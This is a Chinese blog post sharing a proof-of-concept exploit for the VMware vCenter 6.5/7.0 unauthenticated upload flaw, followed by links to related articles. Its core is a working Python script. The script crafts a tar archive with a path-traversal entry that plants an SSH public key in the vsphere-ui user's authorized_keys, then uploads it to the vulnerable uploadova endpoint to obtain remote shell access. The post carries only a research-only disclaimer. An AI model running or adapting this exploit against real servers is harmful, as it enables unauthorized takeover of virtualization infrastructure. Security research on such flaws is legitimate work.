[POC分享]VMware vCenter 6.5 / 7.0 Remote Code Execution

最新推荐文章于 2024-11-01 16:03:12 发布
最新推荐文章于 2024-11-01 16:03:12 发布
阅读量2.6k 收藏
点赞数
分类专栏: POC分享 文章标签: 网络安全 渗透测试 安全 C
文章版权归知柯®️所有,非商业使用,转载请声明!
本文链接:https://blog.csdn.net/qq_43332010/article/details/124363518
版权
本文介绍了一种使用Python实现的POC(Proof of Concept)方法,通过构造恶意tar文件,将SSH公钥注入目标系统,以获取对192.168.1.1/vsphere-ui的远程Shell访问。请注意,此技术仅限于安全研究,实际使用中可能涉及法律责任。
摘要由CSDN通过智能技术生成

免责声明:
本POC程序仅供安全研究与教学之用,使用者将其信息做其他用途,由使用者承担全部法律及连带责任,CSDN博客平台及博主鸿渐之翼不承担任何法律及连带责任。

import tarfile
import os
from io import BytesIO
import requests

proxies = {
  "http": "http://127.0.0.1:8080",
  "https": "http://127.0.0.1:8080",
}
def return_zip():
    with tarfile.open("test.tar", 'w') as tar:
        payload = BytesIO()
        id_rsa_pub = 'ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAwgGuwNdSGHKvzHsHt7QImwwJ08Wa/+gHXOt+VwZTD23rLwCGVeYmfKObDY0uFfe2O4jr+sPamgA8As4LwdqtkadBPR+EzZB+PlS66RcVnUnDU4UdMhQjhyj/uv3pdtugugJpB9xaLdrUWwGoOLYA/djxD5hmojGdoYydBezsNhj2xXRyaoq3AZVqh1YLlhpwKnzhodk12a7/7EU+6Zj/ee5jktEwkBsVsDLTTWPpSnzK7r+kAHkbYx8fvO3Fk+9jlwadgbmhHJrpPr8gLEhwvrEnPcK1/j+QXvVkgy2cuYxl9GCUPv2wgZCN50f3wQlaJiektm2S9WkN5dLDdX+X4w=='
        tarinfo = tarfile.TarInfo(name='../../../home/vsphere-ui/.ssh/authorized_keys')
        f1 = BytesIO(id_rsa_pub.encode())
        tarinfo.size = len(f1.read())
        f1.seek(0)
        tar.addfile(tarinfo, fileobj=f1)
        tar.close()
        payload.seek(0)
def getshell(url):
    files = {'uploadFile':open('test.tar','rb')}
    try:
        r = requests.post(url=url, files=files,proxies=proxies,verify = False).text
        print(r)
    except:
        print('flase')

if __name__ == "__main__":
    try:
        return_zip()
        url="https://192.168.1.1/ui/vropspluginui/rest/services/uploadova"
        getshell(url)
    except IOError as e:
        raise e
IT鹅
关注
专栏目录
CVE-2021-21972 Vmware vcenter未授权任意文件/RCE漏洞
战神/calmness的博客
02-25 1万+
目录 ​描述 据了解 安装环境 影响版本 过程分析 修复建议 临时修补建议 参考链接 描述 2021年02月24日,某些平台监测到 Vmware官方发布了vCenter Server安全更新,修复了vSphereClient (HTML5)在vCenter Server插件vRealizeOperations(vROps)中的一个远程代码执行漏洞(CVE-2021-21972)。VMware vCenter Server是美国威睿(VMware)公司的一套服务器和虚拟化管理软件。该.
VMware vCenter Server远程代码执行漏洞复现 CVE-2021-21972
热门推荐
Ms08067安全实验室
08-18 1万+
文章来源|MS08067安全实验室本文作者:Taoing(WEB高级攻防班讲师)0x00 漏洞描述CVE-2021-21972 vmware vcenter的一个未任意位置,然后执行web...
CVE-2021-21972-vCenter-6.5-7.0-RCE-POC
03-04
CVE-2021-21972-vCenter-6.5-7.0-RCE-POC poc只需验证某人的路径的返回状态 POC仅用于测试,未添加EXP模块 POC仅用于测试,未加入exp模块
CVE-2021-21972-vCenter-6_5-7_0-RCE POC
0xff
02-25 462
漏洞背景 CVE-2021-21972 vmware vcenter的一个未授权的命令执行漏洞。该漏洞可以上传一个webshell至vcenter服务器的任意位置,然后执行webshell即可。 自查poc 访问https://<VC-IP-or-FQDN>/ui/vropspluginui/rest/services/updateova 如果404,则代表不存在漏洞,如果200,或者405则代表存在漏洞 import requests import urllib3 from
记一次VMware vCenter渗透过程(主要是踩坑分享
2401_83799022的博客
06-26 942
如果访问https ://ip :port,跳转到了某个域名链接,那么/SSO/后面跟的就是该域名。该工具,在VM安装目录下自带,就不用去别的地方下载了。选中VM图标,右键“打开文件位置”即可。因为机器都是生产相关的机器,不能使用克隆虚拟机等的骚操作,所以这里只介绍生成快照的方式。进到控制台后,如果发现域控机器,就可以使用生成快照,然后用工具分析快照文件抓hash。添加完后注意,不要直接刷新,而是访问https: //ip/ui,否则就会这样。环境问题可能会浪费很多时间,回头不行再看,这里换个脚本。
CVE-2021-22005:VMware vCenter GetShell(yes)
Foreverlove112的博客
10-01 1328
CVE-2021-22005:VMware vCenter GetShell(yes)
vCenter 6.5-7.0 RCE 漏洞复现(CVE-2021-21972)附POC
内心不种满鲜花就会长满杂草
03-11 1万+
一. 漏洞介绍 vSphere 是 VMware 推出的虚拟化平台套件,包含 ESXi、vCenter Server 等一系列的软件。其中 vCenter Server 为 ESXi 的控制中心,可从单一控制点统一管理数据中心的所有 vSphere 主机和虚拟机。 2021年02月24日,某些平台监测到 Vmware官方发布了vCenter Server安全更新,修复了vSphereClient (HTML5)在vCenter Server插件vRealizeOperatio...
HTTP.sys remote code execution vulnerability
luopanhong的博客
06-02 9213
IIS 系列 Http.sys处理 Range 整数溢出漏洞导致远程代码执行1.漏洞概要2015 年 04 月 14 日,微软发布严重级别的安全公告 MS15-034,编号为 CVE-2015-1635,据称在 Http.sys 中的漏洞可能允许远程执行代码。2. 漏洞描述CWE: CWE-119 CVE: CVE-2015-1635    Http.sys 是一个位于 Windows 操作系统核...
VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972:VMware vCenter未授权RCE(CVE-2021-21972)
03-04
VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972 zoomeye dork:app:“ VMware vCenter” 使用pocsuite3编写的无害检测 ,使用近一年的数据进行探测: 成功率大约:1551/3998 = 39%
CodeTest自动生成POC刷漏洞工具
02-28
CodeTest是一款自动化安全测试工具,主要用于自动生成Proof of Concept(POC)来检测软件系统中的安全漏洞。在IT行业中,POC是证明一个安全漏洞确实存在的一种技术验证,它通常是一段代码或脚本,当运行时能复现漏洞...
使用threading多线程访问baidu,输出状态码及访问时间
jexsen的博客
02-26 247
使用threading多线程访问baidu,输出状态码及访问时间 #!/usr/bin/env python # -*- coding: utf-8 -*- import threading import time import requests def baidu(): # 获取发送请求前的当前时间 time_start = time.time() # 使用requests模块,向百度发送get请求 r = requests.get(url='http://www.b
Vmware Vcenter 任意文件读取漏洞
战神/calmness的博客
10-14 5574
目录 1、描述 2、环境 3、过程 4、修复建议 Vmware Vcenter 任意文件读取漏洞 时间2020年10月13日 1、描述 VMware vCenterServer 【服务器管理软件】提供了一个可伸缩、可扩展的平台,为 虚拟化管理奠定了基础。VMware vCenter Server(以前称为 VMware VirtualCenter),可集中管理 VMware vSphere 环境,与其他管理平台相比,极大地提高了 IT 管理员对虚拟环境的控制。VMware vCenter ..
CVE-2021-21972 Vmware vcenter未授权 获取linux RCE-细节
qq_40015778的博客
02-26 1885
CVE-2021-21972 Vmware vcenter未授权 获取linux RCE-细节 在本文中,我将介绍如何发现VMware vSphere客户端RCE漏洞,泄露技术细节并说明如何在各种平台上利用它。 发现漏洞 在对vSphere Client进行分析的过程中,我一如既往地采用了黑盒和白盒两种方法进行测试,重点关注未经授权即可利用的漏洞。从Web面板,我尝试发送尽可能多的不同请求,所有请求都没有Cookie标头。 向发送未经授权的请求后/ui/vropspluginui/rest/services
(CVE-2021-21972)Vmware vcenter未授权任意文件上传
m0_58687645的博客
01-10 2708
一、漏洞简介 VMware是一家云基础架构和移动商务解决方案厂商,提供基于VMware的虚拟化解决方案。 高危严重漏洞: 在 CVE-2021-21972 VMware vCenter Server 远程代码漏洞 中,攻击者可直接通过443端口构造恶意请求,执行任意代码,控制vCenter。 漏洞为任意文件上传: 存在问题的接口为 /ui/vropspluginui/rest/services/uploadova, 完整路径 (https://ip:port/ui/vropsplug..
Vmware vcenter未授权任意文件/RCE漏洞的复现与分析
weixin_46236101的博客
02-28 4448
0x01 背景 vSphere是VMware推出的虚拟化平台套件,包含ESXi、vCenter Server等一系列的软件。其中vCenter Server为 ESXi的控制中心,可从单一控制点统一管理数据中心的所有vSphere主机和虚拟机,使得IT管理员能够提高控制能力,简化入场任务,并降低IT环境的管理复杂性与成本。 vSphere Client(HTML5)在vCenter Server插件中存在一个远程执行代码漏洞。未授权的攻击者可以通过开放443端口的服务器向vCenter Server发送
CVE-2021-21972 Vmware vcenter未授权任意文件上传分析
weixin_39811856的博客
03-12 494
背景 CVE-2021-21972 vmware vcenter的一个未授权的命令执行漏洞。该漏洞可以上传一个webshell至vcenter服务器的任意位置,然后执行webshell即可。 漏洞产生原因 vropspluginui插件上传文件的时候没有校验文件名称,并且直接拼接到/tmp/unicorn_ova_dir后面 while(entry != null) { if (entry.isDirectory().
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8531
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于 SM3 的密钥派生函数 (KDF):国密合规的安全密钥生成方案
A_Lonely_Smile的博客
10-29 1036
在现代加密技术中,密钥派生函数(Key Derivation Function, KDF)是一个将初始输入(如密码、共享密钥等)转换为安全密钥的过程,用于实现加密、消息认证等密码操作。特别是在符合国密标准的场景中,基于 SM3 的 KDF 已成为一种常用的密钥生成方式。本文将详细讲解 SM3-KDF 的工作原理,逐步介绍其实现过程,并提供 Java 代码示例,帮助您理解如何在项目中应用 SM3-KDF。
冷钱包与热钱包的差异 | 加密货币存储的安全方案
最新发布
tusik68的博客
11-01 1218
想要安全存储加密货币?了解冷钱包和热钱包的核心差异,找到适合的存储方式,确保您的数字资产安全无忧。
CITRIX POC实施:XS6.5上部署XD7.6与XA7.6
"本文档是关于在CITRIX环境下,如何在XENSERVER 6.5上部署XD 7.6和XA 7.6的POC(Proof of Concept)标准化实施指南。文档包含了基础环境的搭建,如域控服务器、DNS、DHCP服务的配置,以及虚拟机的生成和加入域的步骤...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

IT鹅

您的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值